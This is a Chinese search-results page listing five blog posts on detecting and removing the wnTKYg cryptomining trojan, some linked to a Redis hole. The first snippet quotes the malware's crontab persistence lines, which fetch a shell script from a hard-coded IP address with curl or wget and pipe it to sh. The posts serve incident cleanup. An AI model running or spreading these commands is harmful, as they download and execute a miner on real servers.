码迷,mamicode.com
首页 >  
搜索关键字:wntkyg    ( 5个结果
清除wnTKYg 挖矿工木马的过程
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh 发现服务器CPU占用率超100,先不要着急删除文件,确定文件 ...
分类:其他好文   时间:2017-12-15 12:34:29    阅读次数:168
清除wnTKYg 这个挖矿工木马的过程讲述
由于工作需要,我由一个专业java开发工程师,渐渐的也成为了不专业的资深的运维工程师了。感慨一番,书归正传,下面就讲解wnTKYg如何清除。最近项目在做性能测试,发现CPU使用率异常,无人访问时CPU也一直保持75%,然后在xShell上top了一下,发现wnTKYg这个程序CPU占用率300%,直 ...
分类:其他好文   时间:2017-10-19 16:35:21    阅读次数:135
记录一次wnTKYg挖矿木马发现和清理
前一段时间突然收到一条服务器CPU告警,大致看了下是一台测试机,刚刚开始以为是在做压力测试,但是再认真看下服务器的CPU是在极高的负载下发的告警,就去咨询了下发现此时并没有在压力测试,平时如果测试服务没有做压测的时候CPU是几乎负载都极地的,此时服务器突然CPU高负载..
分类:其他好文   时间:2017-10-09 09:58:12    阅读次数:261
记录清除wnTKYg挖矿工木马(守护进程ddg.xxxx)的过程
起因,阿里云多次提醒我的一台服务器有恶意发包行为,且给出了一些解决办法。之前也没太在意,就按照解决办法处理了一下。然后过一段时间,还是提示有此行为。 猜肯定是中了木马了,开始以为是被肉鸡了拿来做DDoS攻击别人了。今天去服务器上仔细看了一下。然后发现了问题究竟(目前猜应该如此,还等待观察)。 现将过 ...
分类:系统相关   时间:2017-08-29 12:58:21    阅读次数:245
彻底杀掉redis挖矿程序及其守护进程wnTKYg
今天又遇到了一件烦心的事,前几天刚解决服务器内存跑满的问题,今天又碰到了神奇而又久违的redis挖矿程序。 查询了一下挖矿,就是有人借助redis漏洞借用别人的服务器进行挖矿。 上次做电子商城项目时,开发过程中环境用的阿里云服务器,中途碰到了俄罗斯的ip成功黑了我的服务器,好在文件访问权限有限制,对 ...
分类:系统相关   时间:2017-08-01 20:52:06    阅读次数:339
5条  
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!